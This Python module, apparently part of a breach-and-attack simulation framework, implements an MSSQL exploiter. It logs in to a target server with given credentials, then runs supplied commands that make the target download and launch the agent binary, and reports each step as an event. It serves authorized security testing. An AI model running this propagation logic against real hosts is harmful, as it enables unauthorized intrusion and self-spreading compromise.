from logging import getLogger
from time import time
from typing import Set, Tuple

from common.agent_events import ExploitationEvent, PropagationEvent
from common.credentials import Credentials
from common.event_queue import IAgentEventPublisher
from common.tags import (
    BRUTE_FORCE_T1110_TAG,
    COMMAND_AND_SCRIPTING_INTERPRETER_T1059_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)
from common.types import AgentID, Event, NetworkPort
from infection_monkey.i_puppet import TargetHost

from .mssql_client import MSSQLClient
from .mssql_options import MSSQLOptions

logger = getLogger(__name__)

MSSQL_EXPLOITER_TAG = "mssql-exploiter"
EXPLOITATION_TAGS = (
    MSSQL_EXPLOITER_TAG,
    BRUTE_FORCE_T1110_TAG,
    EXPLOITATION_OF_REMOTE_SERVICES_T1210_TAG,
)
PROPAGATION_TAGS = (
    MSSQL_EXPLOITER_TAG,
    COMMAND_AND_SCRIPTING_INTERPRETER_T1059_TAG,
    INGRESS_TOOL_TRANSFER_T1105_TAG,
)


class MSSQLExploitClient:
    def __init__(
        self,
        exploiter_name: str,
        agent_id: AgentID,
        agent_event_publisher: IAgentEventPublisher,
        mssql_client: MSSQLClient,
    ):
        self._exploiter_name = exploiter_name
        self._agent_id = agent_id
        self._agent_event_publisher = agent_event_publisher
        self._client = mssql_client

    def exploit_host(
        self,
        host: TargetHost,
        options: MSSQLOptions,
        credentials: Credentials,
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        ports_to_try: Set[NetworkPort],
    ) -> Tuple[bool, bool]:
        """
        Exploit the host over MSSQL using the given credentials.

        :param host: The host to exploit
        :param credentials: The credentials to use
        :param download_agent_command: The command to download the agent binary
        :param launch_agent_command: The command to launch the agent binary
        :param agent_binary_downloaded: An event that will be set when the agent binary
            is downloaded
        :return: A tuple of (exploitation_success, propagation_success)
        """

        exploitation_success = self._exploit(host, ports_to_try, credentials)
        if not exploitation_success:
            logger.debug("Exploitation was unsuccessful, did not attempt propagation")
            return (False, False)

        propagation_success = self._propagate(
            host,
            download_agent_command,
            launch_agent_command,
            agent_binary_downloaded,
            options.agent_binary_download_timeout,
        )

        return exploitation_success, propagation_success

    def _exploit(
        self, host: TargetHost, ports_to_try: Set[NetworkPort], credentials: Credentials
    ) -> bool:
        exploitation_message = ""
        exploitation_success = True

        timestamp = time()
        try:
            self._client.login(host.ip, ports_to_try, credentials)
        except Exception as err:
            exploitation_message = f"Failed to login to MSSQL server on {host.ip}: {err}"
            exploitation_success = False

        self._publish_exploitation_event(
            host, timestamp, exploitation_success, exploitation_message
        )

        return exploitation_success

    def _propagate(
        self,
        host: TargetHost,
        download_agent_command: str,
        launch_agent_command: str,
        agent_binary_downloaded: Event,
        agent_binary_download_timeout: float,
    ) -> bool:
        propagation_message = ""
        propagation_success = True
        timestamp = time()
        try:
            # TODO: Roll download & run into a single command?
            self._client.run_command(download_agent_command)

            logger.debug("Waiting for the target to download the agent binary...")
            if agent_binary_downloaded.wait(agent_binary_download_timeout):
                self._client.run_command(launch_agent_command)
            else:
                propagation_success = False
                propagation_message = "Agent binary download timed out"

        except (Exception, RuntimeError) as err:
            propagation_success = False
            propagation_message = f"{err}"

        self._publish_propagation_event(host, timestamp, propagation_success, propagation_message)
        return propagation_success

    def _publish_exploitation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        self._agent_event_publisher.publish(
            ExploitationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(EXPLOITATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )

    def _publish_propagation_event(
        self, host: TargetHost, timestamp: float, success: bool, message: str
    ):
        self._agent_event_publisher.publish(
            PropagationEvent(
                source=self._agent_id,
                target=host.ip,
                timestamp=timestamp,
                tags=frozenset(PROPAGATION_TAGS),
                success=success,
                exploiter_name=self._exploiter_name,
                error_message=message,
            )
        )
